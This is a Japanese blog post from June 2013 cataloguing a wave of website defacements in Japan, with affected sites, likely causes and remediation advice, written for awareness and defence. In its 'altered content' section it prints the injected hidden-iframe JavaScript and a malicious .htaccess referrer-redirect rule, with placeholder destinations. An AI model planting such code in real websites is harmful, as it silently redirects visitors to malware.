2013-06-04
5月から多発しているHP改ざんインシデントをまとめてみた。
インシデントまとめ | |
概要
5月に入ってから複数の組織でホームページの改ざんが発生していると報じられています。この件に直接関連しているかは不明ですが、IPAや警察庁、トレンドマイクロもホームページの改ざんに関して注意喚起や情報を掲載しています。IPAは2008年に猛威を振るったGumblarによるものや2012年9月18日前後に多発したHP改ざんの規模に匹敵すると発表しています。ここでは5月以降発生している改ざんインシデントについてついてまとめます。
- (PDF)外見上変化のないウェブサイト改ざん事案の多発について - @police(警察庁)
- (PDF)ウェブサイト改ざん事案の多発に係る注意喚起について - @police(警察庁)
- 2013年6月の呼びかけ「 ウェブサイトが改ざんされないように対策を! 」- IPA
- JPCERT/CC Alert 2013-06-07 Web サイト改ざんに関する注意喚起 - JPCERT/CC
- 日本を標的とするハクティビズム的 Web 改ざん攻撃を確認:今後の攻撃拡大に注意 - TrendMicro
- 日本のWebサイト改ざんを複数確認:PCは常に最新状態に! | トレンドマイクロ セキュリティ ブログ (ウイルス解析担当者による Trend Micro Security Blog)
- 国内Webサイト改ざん事例続報:攻撃手法の詳細と得られる対策の教訓 | トレンドマイクロ セキュリティ ブログ (ウイルス解析担当者による Trend Micro Security Blog)
改ざんの概要イメージ
現時点で判明している情報、及びそこから推測される内容を踏まえて一連の流れを図にしました。(改ざんが行われるまでの流れは推測部分が多く含まれます。)
改ざんされたサイト
5月以降、ホームページが改ざんされたことを公表しているサイトを以下に掲載します。全ての組織がこのように公表することはないと考えられるため、これらサイトも多発している改ざんの一部だと思われます。また以下のリストは「HPが改ざん」されたことを共通点としているだけであり、これら一連の改ざんが関連したものであるかは不明です。
No | 改ざんされたサイト | URL | 改ざん期間*1 | 改ざん原因 | 改ざん内容 | 掲載文 |
1 | 鹿児島県教職員互助組合 | kyogo.or.jp | 05/01 2:45〜05/02 13:32 | 掲載無 | ウィルスに感染する可能性 | *2 |
2 | アウンコンサルティング株式会社 | www.auncon.co.jp | 05/01〜05/07 | サーバーへの不正アクセス | ウィルスに感染する可能性 HEUR:Trojan.Script.Generic | *3 |
3 | 赤髭亭 | akahigetei.extrem.ne.jp | 掲載無 (05/18に判明、その後6/2に復旧するも再度改ざん) | 掲載無 | ウィルスに感染する可能性 JS:IFrame-BLN[Trj] JS:IFrame-AHU[Trj] | *4 *5 |
4 | 世界人権問題研究センター | www.mmjp.or.jp/jinken | 05/21〜05/28午後 | デンマークからの不正アクセス | ウィルスに感染する可能性 | *6 *7 |
5 | 有限会社APCブレーン | APCブレーン及び所属アーティスト含む関連ページ www.apc-brain.co.jp レディバード www.apc-brain.co.jp/ladybird | 05/22 19:37〜05:26 1:27 | 掲載無 | ウィルスに感染する可能性 Trojan:JS/Rediredtor.MB | *8 |
6 | 日本産業廃棄物処理振興センター | www.jwnet.or.jp/whatsnew/index.php www.jwnet.or.jp/oshirase/index.php www.jwnet.or.jp/workshop/index.php | 掲載無(修正は05/17) | 掲載無 | ウィルスに感染する可能性 TROJ_FAKEAV亜種 | *9 |
7 | リコージャパン | プリントアウトファクトリー www.printout.jp | 05/25 7時頃〜05/31 22時半頃 | 掲載無 | ウィルスに感染する可能性 トロイの木馬型マルウェア | *10 |
8 | 株式会社ディーバ | www.diva.co.jp | 05/25 15:50〜05/29 15:10 | 第三者の不正アクセス | ウィルスに感染する可能性 | *11 |
9 | 科学技術振興機構 | crds.jst.go.jp/5th/ crds.jst.go.jp/about_sympo/crds.jst.go.jp/access/crds.jst.go.jp/GIES/crds.jst.go.jp/daily/ | 05/25〜05/27 10時頃 2013/06/01〜2013/06/03 11時55分 | 掲載無 | 悪性サイトへ誘導される可能性 | *12 |
10 | 三重交通グループホールディングス株式会社 | 観光販売システムズホームページ kanko-pro.co.jp トライパルツアー sanq-tripal.com 熊野古道シャトルバス Kumanokodo.co.jp みえ観光ウェブ mie-kanko.jp | 05/26 17:00〜06/01 17:00 | 掲載無 | ウィルスに感染する可能性 | *13 *14 |
11 | 横浜シティ・エア・ターミナル株式会社 | YCAT www.ycat.co.jp | 05/26 23:00〜05/27 17:00 | 掲載無 | ウィルスに感染する可能性 | *15 |
12 | 神奈川県保険医協会 | 「いい医療.com」の一部 | 05/27 0:00〜14:00 | PC経由による不正アクセス | 悪性サイトへ誘導される可能性 | *16 *17 |
13 | 美浜町 | www.town.mihama.aichi.jp | 05/28 13:00〜16:00 | 掲載無 | ウィルスに感染する可能性 | *18 |
14 | 田原総一郎 | www.taharasoichiro.comの一部 | 05/28〜05/29 13時 | 掲載無 | 悪性サイトへ誘導 | *19 |
15 | 株式会社アーク | 京のすっぴんさん www.suppinsan.com | 05/28 15:17〜05/29 14:00 | 掲載無 | ウィルスに感染する可能性 | *20 |
16 | ワタナベ ランド | LAND et vous landetvous.com | 掲載無(掲載日付は05/29) | 掲載無 | ウィルスに感染する可能性 | *21 |
17 | ミツミ電機株式会社 | www.mitsumi.co.jp | 5/29 7:20〜13:37 | 3回にわたり不正アクセス | ウィルスに感染する可能性 | *22 |
18 | 株式会社アジュバンコスメジャパン | Re:PRO www.repro-top.com | 05/29 17:00〜06/01 9:25 | 掲載無 | ウィルスに感染する可能性 JS_Trojan.Crypt.MT | *23 |
19 | 情報ネットワーク法学会 | in-law.jp配下のWebページ全て | 05/29 19時〜05/30 12時 | FTPあるいはSSH | 悪性サイトへ誘導 | *24 |
20 | 沖縄県 | 県立玉城青少年の家 www.okinawa-nanjo-youthhome.jp | 05/29 20:00〜06/03 11:00 | 掲載無 | 文字化け ウィルスに感染する可能性 | *25 |
21 | 山梨県立塩山高等学校 | 塩山高校商業研究部 www.enzanh.kai.ed.jp/ENZAN business research club WEB/配下のページ塩山高校女子ソフトボール部 www.enzanh.kai.ed.jp/ENZAN softball club WEB/配下のページ | 05/29〜05/30 | 掲載無 | ウィルスに感染する可能性 | *26 |
22 | フジ印刷株式会社 | WarpStyle warpstyle.jp | 05/29〜05/30 12:00 | Webサーバーへの不正アクセス | ウィルスに感染する可能性 | *27 |
23 | 横浜市 | 横浜観光情報 www.welcome.city.yokohama.jp | 05/30 4:00〜16:30 | 掲載無 | 書き換えられたのみ | *28 |
24 | 横浜市 | www.kuraki-noh.jp | 05/30 10:00〜06/04 12:10 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *29 |
25 | 日比谷アミューズメントプランニング | らんの里 堂ヶ島 www.dogashima.com | 05/30 14:16〜18:22 | 掲載無 | ウィルスに感染する可能性 悪性サイトへ誘導される可能性 | *30 |
26 | 愛知県バドミントン協会 | www.badminton-aichi.comの一部 | 05/30 17:13〜06/01 17:30 | 掲載無 | ウィルスに感染する可能性 | *31 |
27 | 東京大学医学部付属病院 | www.h.u-tokyo.ac.jp | 05/30 20:00〜05/31 2:30 | 管理業者PC感染による改ざん | ウィルスに感染する可能性 | *32 |
28 | ときめきドットコム | シンニチプレミアムストア njpw-p.jp | 05/30 19時〜06/03 14時 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *33 |
29 | 姫路市まちづくり振興機構 | himeji-machishin.jp | 05/31 4:30〜17:00 | 掲載無 | ウィルスに感染する可能性 | *34 |
30 | 株式会社幼児教育実践研究所 | こぐま会 www.kogumakai.co.jp | 05/31 18:30〜06/04 10:00 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *35 |
31 | 株式会社テレワークマネジメント | www.telework-management.co.jpの一部 | 05/31未明〜11時頃 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *36 |
32 | ☆脱!カラオケコンプレックス | www.arcadia.gr.jp | 5月末〜06/04 AM | 掲載無 | ウィルスに感染する可能性 HEUR:Trojan.Script.Generic | *37 |
33 | エフエム群馬 | fmgunma.com配下の248ファイル | 06/01 5時〜06/03 13時 | 外部から不正アクセス | ウィルスに感染する可能性 | *38 *39 |
34 | 仙台市農作物有害鳥獣対策協議会 | www.inocc.jpの一部 | 06/01〜06/03アクセス | 掲載無 | ウィルスに感染する可能性 | *40 |
35 | 株式会社ウェブメッセージ | plaza.rakuten.co.jp/toretama/ | 06/01〜06/02 | 掲載無 | 掲載無 | *41 |
36 | 北海道文教大学 | www.do-bunkyodai.ac.jp | 掲載無(06/02に判明) | 掲載無 | ウィルスに感染する可能性 | *42 |
37 | 神戸市立桃山台児童館 | www.eonet.ne.jp/~momoyamadai/ | 06/02〜06/03 | 掲載無 | ウィルスに感染する可能性 | *43 |
38 | 日本馬術連盟 | www.equitation-japan.comの一部 | 06/04 15:47〜17:25 | 掲載無 | 掲載無 | *44 |
39 | 有限会社ゆたぷろ | www.yutapro.comの一部 | 06/04 17:00〜06/05 11:45 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *45 |
40 | 能登空港利用促進協議会 | www.notohantou.net | 06/05 1:00〜10:00 | 第三者の不正アクセス | トップページが表示されない ウィルスに感染する可能性 | *46 |
41 | 札幌市 | 札幌市ワークライフ・バランス推進事業 www.sapporo-wlb.jp | 改ざん時期不明〜06/05 0:10 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *47 *48 |
42 | 日本創造教育研究所 | ありがとう経営のすすめ arigatou-keiei.jp 業績アップ研修.com gyoseki-up.com 心に残るありがとう体験談募集 arigatou-taiken.jp 朝礼.com cho-rei.com ありがとう卓越経営大賞 arigatou-takuetsu.jp 人事セミナー.com yarigai-jinji.com ありがとうブログ arigatou-blog.com 建設みらい研究所 kensetsu-mirai.com | 05/29 20:42〜05/30 11:13 | 掲載無 | ウィルスに感染する可能性 Gumblarの亜種 | *49 |
43 | 有限会社 ビブリオポリ | www.bibliopoly.co.jp | 掲載無 | 掲載無 | 掲載無 | *50 |
44 | 株式会社アーク | www.organic-skincare.jpの一部 | 05/28 15:17〜05/29 12:40 | 第三者の不正アクセス | ウィルスに感染する可能性 | *51 |
45 | アール・ビー・コントロールズ株式会社 | www.rbcontrols.co.jpのHTMLファイル全て | 06/02 10:20〜06/03 10:00 | 第三者の不正アクセス | ウィルスに感染する可能性 JS/Kryptik.AKY | *52 |
46 | エスペック株式会社 | Test-Navi www.test-navi.com | 06/04 17:00〜06/05 12:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *53 |
47 | 札幌市 | ようこそさっぽろ www.welcome.city.sapporo.jp | 掲載無(06/05 9:00発覚)〜06/06 20:00 | 掲載無 | 掲載無 | *54 *55 |
48 | 早稲田スポーツ新聞会 | www.wasedasports.com | 掲載無(06/05 22:32時点で改ざん確認) | 掲載無 | 掲載無 | *56 |
49 | 寺本法律会計事務所 | teramoto-law.jp | 05/31〜06/06 | 第三者の不正アクセス | ウィルスに感染する可能性 | *57 |
50 | 函館信用金庫 | www.hakodate-shinkin.jpの一部 | 06/03 1:00〜06/04 9:30 | 第三者の不正アクセス | ウィルスに感染する可能性 | *58 |
51 | 株式会社トヨシマ | www.kk-toyoshima.co.jpの一部 | 05/29〜06/03 | 第三者の不正アクセス | ウィルスに感染する可能性 | *59 |
52 | 浜松グリーンウェーブ株式会社 | www.hgw.co.jpの一部 | 06/03 4:00〜06/06 22:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *60 *61 |
53 | 株式会社アーク | ふじ光成堂薬局 www.sasaherusu.comの一部 | 05/28 15:17〜05/29 12:40 | 第三者の不正アクセス | ウィルスに感染する可能性 | *62 |
54 | 株式会社アーク | ふじ光成堂薬局 www.organic-skincare.jpの一部 | 05/28 15:17〜05/29 12:40 | 第三者の不正アクセス | ウィルスに感染する可能性 | *63 |
55 | 上毛新聞TRサービス | TRサービスホームページ www.j-tr.jp デリジェイホームページ deli-j.j-tr.jp | 掲載無(06/04判明) | 掲載無 | ウィルスに感染する可能性 | *64 |
56 | 北恵株式会社 | www.kitakei.jp | 06/01 23:00〜06/04 12:00 | 外部委託サーバーへ不正アクセス | ウィルスに感染する可能性 JS/Kryptik.ANY | *65 |
57 | 有限会社アップフィールド | 日報Webシステム np-sys.info | 05/25 16:50〜05/30 00:00 | 掲載無 | ウィルスに感染する可能性 | *66 |
58 | 株式会社一幸陶苑 | PRIMAG www.pri-mug.com | 掲載無 | 掲載無 | ウィルスに感染する可能性 | *67 |
59 | 株式会社エー・ティー・エックス | 複数の特設ページ www.at-x.com/html/ | 06/04〜06/06 20:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *68 |
60 | 株式会社ミノウラ | www.mnr.co.jp | 05/03〜05/28 | 第三者の不正アクセス | ウィルスに感染する可能性 | *69 |
61 | 日本デオドール株式会社 | www.deodor.co.jp | 05/28〜06/02 | 国外からの不正アクセス | 掲載無 | *70 |
62 | 大富士フットボールクラブ | ohfuji-fc.com | 05/04〜05/06 | 掲載無 | ウィルスに感染する可能性 | *71 |
63 | 葉鍼灸院 | you-sinkyu-in.com | 05/28 15:31〜19:48 | 米国からの不正アクセス | ウィルスに感染する可能性 | *72 |
64 | 板橋区立成増小学校支援地域本部 | narimasu.gr.jp | 05/18 13:00〜22:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *73 |
65 | 株式会社CRAZY TV | www.crazytv.com | 05/29〜06/03 | 第三者の不正アクセス | ウィルスに感染する可能性 | *74 |
66 | 株式会社 かなえるリンク | www.kanaerulink.co.jp | 06/02 11:50〜06/04 18:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *75 |
66 | 緑秀会田無病院 | www.tanashi-hospital.or.jp | /06/03 1:00〜06/04 12:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *76 |
67 | 株式会社ドゥ・ハウス | モラタメ.net www.moratame.net | 06/05 18:44〜06/07 6:30 | 第三者の不正アクセス | ウィルスに感染する可能性 | *77 |
68 | 札幌静修高等学校 | www.sapporoseishu.ed.jp | 06/02 14:00〜06/04 9:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *78 |
69 | 日本文化出版株式会社 | NBPオンラインショッピング shop.nbp.ne.jp | 05/30 8:00〜06/06 20:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *79 |
70 | 海洋研究開発機構 | 高知コア研究所 www.kochi-core.jp | 05/25〜05/29 | 第三者の不正アクセス | ウィルスに感染する可能性 | *80 |
71 | ゑびすや | www.ebisuyagolf.com | 06/02〜06/05 15:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *81 |
72 | すみだ産業会館 | www.sumidasangyokaikan.jp | 06/05 | 第三者の不正アクセス | ウィルスに感染する可能性 | *82 |
73 | 地盤工学会 | 電子図書室サービス www.jgs-library.net | 掲載無(06/03判明)〜06/04 | 第三者の不正アクセス | ウィルスに感染する可能性 | *83 |
74 | 愛知・豊川用水振興協会 | aitoyo.or.jp | 05/29 15:00〜06/06 18:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *84 |
75 | 栄信電気工業株式会社 | www.eisin.co.jpの一部 | 05/31〜06/03 | 第三者の不正アクセス | ウィルスに感染する可能性 | *85 |
76 | 登録紹介宣伝あくせすくん | park1.wakwak.com/~com/ | 掲載無(06/01掲載) | 不明 | 不明 | *86 |
77 | 日本赤十字社 | www.jrc.or.jp | 05/30 20:00〜21:54 | 第三者による改ざん | ウィルスに感染する可能性 | *87 |
78 | 株式会社HKS | バスデポ bus-depot.in | 06/04 23:00〜06/06 12:00 | 第三者による不正アクセス | ウィルスに感染する可能性 | *88 |
79 | 石川県教職員互助会 | www.ishikyogo.or.jpの一部 | 05/31 0:00〜16:00 | 第三者による不正アクセス | ウィルスに感染する可能性 | *89 |
80 | 株式会社アクア | www.aqua-ltd.com | 05/31 7:39〜06/05 2:46 | 第三者による不正アクセス | ウィルスに感染する可能性 | *90 |
81 | 国立民族学博物館 | 関雄二教授個人HP www.r.minpaku.ac.jp/sekito/ | 05/25〜06/06 | 第三者による不正アクセス | ウィルスに感染する可能性 | *91 |
82 | 長谷川敬税理士事務所 | office-hasegawa.com | 05/29〜06/03 19:00 | 第三者による不正アクセス | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *92 |
83 | TokiwagiFC Fan | tokiwagifcfan.com | 掲載無(06/04に判明) | 掲載無 | ウィルスに感染する可能性 | *93 |
84 | 東京こけし友の会 | www.tokyo-kokeshi.jp | 05/30〜06/04 | 掲載無 | 掲載無 | *94 |
85 | ΜΟΟΥΣΕΊΟΝ | www.moouseion.com www.hisaoh.com www.letharia.com | 05/28〜05/30 | 海外からの不正アクセス | 掲載無 | *95 |
86 | 松菱金属工業株式会社 | www.matsubishi-kinzoku.co.jpの一部 | 06/01 16:40〜06/04 16:40 | 悪意を持った第三者からの攻撃 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *96 |
87 | 日本グラフィックサービス工業会 | www.jagra.or.jp | 06/03 2:00〜10:00 | 掲載無 | ウィルスに感染する可能性 トロイの木馬 (不正JavaScriptの埋め込み) | *97 |
88 | 盛岡三菱自動車販売株式会社 | morioka-mitsubishi.com | 06/04 18:30〜06/06 13:00 | 第三者の不正アクセス | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *98 |
89 | 北海道文化財団 | haf.jpの一部 | 05/30〜06/03 | 第三者の不正アクセス | ウィルスに感染する可能性 | *99 |
90 | ふどうさんの現代屋 | www.gendaiya.com | 掲載無(06/13発表) | 海外からのFTP接続 | 掲載無 | *100 |
91 | 株式会社さうすウェーブ | southwave.co.jp | 06/01 0:00〜06/04 18:00 | 第三者の不正アクセス | ウィルスに感染する可能性 | *101 |
92 | 湘南鎌倉総合病院 | shonankamakura.or.jp | 06/11 6:40〜13:05 | 第三者の不正アクセス | ウィルスに感染する可能性 | *102 |
01: 08.hanatoweb.jp 02: agc.bunka758.or.jp 03: arcwet.jp 04: asunaro-higashiosaka.jp 05: baseball.h01.jp 06: blog.willcare.jp 07: bellezza8.sakura.ne.jp 08: cdvnet.jp 09: finaledge.jp 10: fuchu.shogaigakushu.jp 11: jci763.or.jp 12: jqkk.jp 13: karilab.jp 14: miharagumi.jp 15: minikiti.wiki2.jp 16: mirai.sa-ba.jp 17: netrunner.sakura.ne.jp 18: nihongo-online.jp 19: soho.h01.jp 20: soulnote.jp 21: www.technis.jp 22: tokyo.cafemix.jp 23: toshei.jp 24: www.cdvnet.jp 25: www.chabai.jp 26: www.cleaningcoco.jp 27: www.coolspot-osaka.jp 28: www.dorf.co.jp 29: www.eiraitei.jp 30: www.fuzoku-watch.com 31: www.ginzado.ne.jp 32: www.hakkosya.co.jp 33: www.heaven-luxu.jp 34: www.hokudai.ac.jp 35: www.hosu-gogo.jp 36: www.ibiz.jp 37: www.jagra.or.jp 38: www.japanprimo.gr.jp 39: www.jicc.co.jp 40: www.k-amity.jp 41: www.ksbnet.co.jp 42: www.lcy.jp 43: www.maguchi.co.jp 44: www.naniwa-kenma.co.jp 45: www.nanbunoyu.jp 46: www.niccori-maccori.jp 47: www.nifa.co.jp 48: www.nodapg.or.jp 49: www.ostec.or.jp 50: www.plan-inc.jp 51: www.popcycle.co.jp 52: www.ruri-diet.jp 53: www.select.jp 54: www.shogakkan.jp 55: www.tohot.jp 56: www.videofes.jp 57: ベンツパーツ.jp 58: cattleya.sitemix.jp
改ざんされる内容
複数の方の報告によればWebサーバー上に配置されている次の拡張子のファイルの全部、または一部に対して、第三者による改ざんが行われています。改ざん方法にはいくつかの種類があり、確認されているものの多くは共通して「0c0896」という文字列が埋め込まれています。改ざんサイトを閲覧した際、悪性サイトへリダイレクトをさせ、そこでマルウェア(以下のese_adminさんのBlogによればFakeAV系)に感染させることを目的としているように見受けられるものの、wakatonoさんが分析されているように書き換えはできたものの埋め込みをしたJavaScriptが動作しない(いわゆる毒入れに失敗したかの)ようなケースもあるようです。*104
- HTMLファイル(.html)
- JSPファイル(.jsp)
- PHPファイル(.php)
- JavaScriptファイル(.js)
- JSONファイル(.json)
- テンプレートファイル(.tpl)
- 分散設定ファイル(.htaccess)
今回の改ざんについて調査・考察されている方の記事
- あちこちで改ざん? - wakatonoの戯れメモ
- 似非管理者の寂しい夜:JavaScriptの実行コードをねじ込むWebウィルス - livedoor Blog(ブログ)
- 相次ぐWeb改ざん被害 遅れる対応-ばびぶべぼBlog
静的コンテンツへの改ざん
静的コンテンツへの改ざんは難読化されたJavaScript(数字の羅列の様な文字列)が埋め込まれます。トレンドマイクロによりJS_BLACOLE.SMTTとして検知される実体は埋め込まれたJavaScriptです。実際に実行されるのは次のようなコードです。変数名等、一部は改ざん先によって異なる場合があるようです。悪性サイトへリダイレクトする1pxのIFRAMEが埋め込まれることになります。
function zzzfff() { var egefi = document.createElement('iframe'); egefi.src = 'http://(リダイレクト先悪性サイトURL)'; egefi.style.position = 'absolute'; egefi.style.border = '0'; egefi.style.height = '1px'; egefi.style.width = '1px'; egefi.style.left = '1px'; egefi.style.top = '1px'; if (!document.getElementById('egefi')) { document.write('<div id=\'egefi\'></div>'); document.getElementById('egefi').appendChild(egefi); } } function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){} else { SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } }
分散設定ファイルへの改ざん
MASAKIさんより.htaccessの改ざんに関する情報を頂きました。検索やポータルサイト等からこの.htaccessが改ざんされたサイトを訪れた場合に悪性サイトへリダイレクトさせるものと思われます。
#0c0896# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://転送先URL [R=301,L] </IfModule> #/0c0896#
改ざんされた原因
現在進行形で起きているためか、改ざん原因について詳細を公表している組織はあまり多くありませんが、改ざん原因を発表している組織がいくつかあり、以下に抜粋します。
- 情報ネットワーク法学会
改ざんは、管理者アカウントを何らかの方法で入手してFTPあるいはSSHにより外部から実行されたものと判断しており
http://in-law.jp/
- 神奈川県保険医協会
本サイトの管理・運営委託会社のパソコンを経由して、サイト用サーバーに不正アクセスがあり、改ざんされるという被害を受けました
http://www.hoken-i.co.jp/outline/cat272/post_102.html
- 赤髭亭
先ほど赤髭亭をUPしているサーバーフォルダ内より観察のためHTMLファイルをダウンロードしソースを確認しようとした所、ウィルス駆除ソフトがDL対象のHTMLを
JS:IFrame-AHU[Trj]
であると判断し隔離駆除を行うという事態が発生いたしました。
よって、上記ウィルスが再UpしたHTMLに再度感染し何らかの改ざんを行った可能性を考え
http://sengoku.gflag.biz/?eid=1547350
- 東京大学医学部付属病院
当院がホームページのコンテンツ管理(CMS)を委託している企業側のパソコンがコンピュータウイルスに感染した事が原因でした。
http://www.h.u-tokyo.ac.jp/oshirase/archives/20130604.html
また、IPAやJPCERT/CCの注意喚起によるとFTPやSSHアカウント情報を窃取するウィルスの存在に触れられています。
“パソコンのJavaのバージョンが古いままだったためにFTPアカウント情報を漏えいさせるウイルスに感染した”というウイルス感染のケース※もありました。
http://www.ipa.go.jp/security/txt/2013/06outline.html
- JPCERT/CC
また、攻撃に使用されている一部のマルウエアには、FTP/SSH クライアントや Web ブラウザなどに保存されている過去に入力したアカウント情報などを窃取する機能を有しているものがあり、Web コンテンツ更新に使用されるアカウント情報がマルウエアにより窃取されている可能性があります。
http://www.jpcert.or.jp/at/2013/at130027.html
さらにこの件に関連していると思われる質問がYahoo知恵袋に投稿されています。この被害を受けた方はFTPサーバーを使っていたようです。
これらから、今回多発している改ざんは、Gumblarのようなマルウェア、あるいは情報を窃取するマルウェアを通じて管理用ID、パスワードが盗まれた*105ことが原因で改ざんされたのではないかと考えられます。*106
改ざんを受けた場合の対策
改ざん被害を受けたサイトはID、パスワードの変更だけにとどまるのではなく、次の点に対応漏れがないか確認してください。
- Webサイト管理用のアプリケーション(CMSや管理ソフト)が最新の状態かどうか
- Webサイトのメンテナンスは管理端末のみに接続が制限されているか
- 管理端末でウィルス対策ソフトによるスキャンが行われているか
- サーバー、管理端末のOS、ウィルス対策ソフト、ドキュメントソフト等がすべて最新の状態か
また今回の事例ではトップページではなく、その配下のWebページが改ざんされているケースも見受けられることから、改ざんされた事実に気づいていない可能性もあり、FTPログや管理するコンテンツに差分が発生していないかも確認したほうが良いでしょう。
関連
- トレンドマイクロは「ハクティビズム」目的の改ざんを警告:国内Webサイトで相次ぐ改ざん - @IT
- 「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け - ITmedia エンタープライズ
- 不正スクリプト埋め込み型のウェブ改ざん被害、複数の国内サイトで確認 -INTERNET Watch
更新履歴
- 2013/06/04 PM 新規作成
- 2013/06/05 AM 北河さんから頂いた情報を反映
- 2013/06/05 AM @wakatonoさんのBlogを元に改ざんされていそうなサイトを列挙
- 2013/06/05 PM @yousukezanさんの情報等を元に最新情報を反映
- 2013/06/05 PM 最新情報を反映
- 2013/06/05 PM 最新情報を反映
- 2013/06/06 AM 最新情報を反映、改ざんの流れ概要イメージを追加
- 2013/06/06 AM 最新情報を反映
- 2013/06/06 PM 最新情報を反映、改ざんされたサイトを時系列に並び替え、MASAKIさんより頂いた改ざんが確認されている拡張子の情報を追加
- 2013/06/06 PM 最新情報を反映
- 2013/06/06 PM 概要や改ざん内容について加筆、修正
- 2013/06/07 PM 最新情報を反映
- 2013/06/07 PM 最新情報を反映
- 2013/06/09 AM 最新情報を反映
- 2013/06/09 PM 最新情報を反映
- 2013/06/10 PM 最新情報を反映、警察庁の注意喚起を掲載
- 2013/06/11 PM 最新情報を反映
- 2013/06/13 AM 最新情報を反映
- 2013/06/13 PM 最新情報を反映
*1:表記は全て2013年発生
*2:鹿児島県教職員互助組合ホームページの改ざんについて,鹿児島県教職互助組合,2013/06/06アクセス:魚拓
*3:コンピュータウイルス感染の報告とお詫び,アウンコンサルティング,2013/06/04アクセス:魚拓
*4:【重要】赤髭亭HP復旧延期についてのお知らせ,赤髭亭,2013/06/04アクセス:魚拓
*5:【重要】赤髭亭が表示されない件およびサーバー移転の御案内,赤髭亭,2013/06/04アクセス:魚拓
*6:世界人権問題研究センターからのお知らせ,世界人権問題研究センター,2013/06/04アクセス:魚拓
*7:HPがウイルス感染 世界人権問題研究センター 京都,MSN産経,2013/06/04アクセス:魚拓
*8:当社ホームページ及び関連ページの改ざんに関するお詫びとご報告,APCブレーン,2013/06/04アクセス
*9:当センターホームページの改ざんに関するお詫び,日本産業廃棄物処理振興センター,2013/06/04アクセス:魚拓
*10:「プリントアウトファクトリー」サイト改ざんに関するお知らせ,リコージャパン,2013/06/04アクセス:魚拓
*11:不正アクセスによるサイト改ざんについて,ディーバ,2013/06/06アクセス:魚拓
*12:ホームページ改ざんに関するお知らせとお詫び,科学技術振興機構,2013/06/04アクセス:魚拓
*13:(PDF)当社のグループ会社におけるWEBサイト改ざんについてのお詫び,三重交通グループホールディングス,2013/06/06アクセス
*14:(PDF)当社のグループ会社におけるWEBサイト改ざんについての追加情報,三重交通グループホールディングス,2013/06/06アクセス
*15:ホームページ改ざんに関するお知らせとお詫び,横浜シティ・エア・ターミナル,2013/06/06アクセス:魚拓
*16:神奈川県保険医協会ホームページ「いい医療.com」の改ざん発生について,神奈川県保険医協会,2013/06/04アクセス:魚拓
*17:(重要)本ウェブサイトの復旧のお知らせとお願い,神奈川県保険医協会,2013/06/04/アクセス:魚拓
*18:美浜町ホームページを閲覧された皆様へ、ホームページ改ざんに関するお詫び,美浜町,2013/06/04アクセス:魚拓
*19:ホームページ改ざんに関するお知らせとお詫び,田原総一郎,2013/06/04アクセス:魚拓
*20:ホームページ改ざんに関するお知らせとお詫び,アーク,2013/06/04アクセス:魚拓
*21:【Night on the Planet および LAND et vous より重要なお知らせ】,ワタナベランド,2013/06/04アクセス:魚拓
*22:<重要なお知らせ>不正アクセスによる障害のお知らせとウィルスチェックのお願い,ミツミ電機,2013/06/04アクセス:魚拓
